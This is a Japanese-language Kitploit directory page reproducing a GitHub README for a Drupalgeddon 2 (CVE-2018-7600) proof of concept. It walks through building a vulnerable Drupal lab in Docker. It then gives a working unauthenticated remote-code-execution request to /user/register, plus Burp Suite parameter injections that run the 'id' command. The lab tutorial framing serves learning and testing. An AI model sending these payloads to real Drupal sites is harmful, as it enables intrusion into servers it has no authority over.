Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
drupal-cve-2018-7600-poc — CVE-2018-7600(Drupalgeddon 2)の概念実証エクスプロイトであり、DockerとBurp Suiteを用いたラボ環境の段階的なセットアップとエクスプロイトのウォークスルーを提供します。 | Kitploit
ツール/GitHubGitHub/dowonkwon/drupal-cve-2018-7600-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubdowonkwon/drupal-cve-2018-7600-poc

drupal-cve-2018-7600-poc

CVE-2018-7600(Drupalgeddon 2)の概念実証エクスプロイトであり、DockerとBurp Suiteを用いたラボ環境の段階的なセットアップとエクスプロイトのウォークスルーを提供します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1年前未レビュー

README

**Drupal Drupalgeddon 2 認証なしリモートコード実行

(CVE-2018-7600)**


Drupal 7.58より前のバージョン、8.3.9より前の8.xバージョン、8.4.6より前の8.4.xバージョン、8.5.1より前の8.5.xバージョンは、Form APIを含むデフォルトまたは共通モジュール構成を使用する複数のサブシステムに影響を与える問題により、リモート攻撃者が任意のコードを実行できるようにする。

参考文献:

  • https://www.drupal.org/sa-core-2018-002
  • https://research.checkpoint.com/uncovering-drupalgeddon-2/

Vulnerable environment


image.png

まず、次の画面のように該当のvulhubの内容をForkしてくる。

image.png

その後、該当フォルダをZIPファイルとしてダウンロードして取得し、

image.png

drupal(CVE-2018-7600)に関連する内容を解凍して自分のリポジトリにアップロード

image.png

次に、そのリポジトリを使ってDockerにその環境を構築してみよう。

image.png

次のように自分のリポジトリをgit cloneコマンドで取得し、docker-compose.ymlファイルが存在するフォルダ内にcdコマンドで移動する。

その後、次のコマンドでバックグラウンドでDockerを実行する。

root@kitploit:~
docker-compose up -d

次のように実行される様子を確認できる。

image.png

http://localhost:8080 のアドレスに移動してDrupalのホームページを表示してみる。

image.png

次のようにDrupal環境設定の画面が表示され、Drupalホームページ画面が出てくる。

Exploitを試すために、次のように簡単に設定する。

image.png

すると次のようにロードされる。

image.png

その後、追加のサイト設定をさらに入力する(Exploitのための迅速な設定としてtestに設定)。

image.png

image.png

image.png

次のように最終的にDrupalサイトの設定まで完了した状態。

image.png

Exploit


a2u/CVE-2018-7600 を参照して、次のリクエストをdrupalに送信できる。

root@kitploit:~
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

CVE-2018-7600(Drupalgeddon2)は、/user/registerを通じてAJAXを利用してフォームフィールドを操作する

認証なし攻撃を試みる脆弱性であるため、Burp Suiteを通じてパケットを改ざんしてみることもできる。

まずBurp Suiteのプロキシサイトを通じて「登録」に入り、適当な値を入力した後パケットをキャプチャする。

image.png

Burp Suiteを使用して該当パケットを操作する。

image.png

該当パケットをRepeaterに送信し、最下部に次のようなコードを追加する。

root@kitploit:~
element_parents = timezone/timezone/#value
ajax_form = 1
_wrapper_format = drupal_ajax
timezone[timezone] = id

その後Sendを送信すると、次のようにOKコマンドが表示されることを確認できる。

image.png

実際により悪意のあるリクエストを行うためには、CVE-2018-7600(Drupalgeddon2)攻撃は Drupalインストール直後(Drupalインストールウィザードが終了する前)に攻撃を送信する方がより確実である。

ツールをダウンロード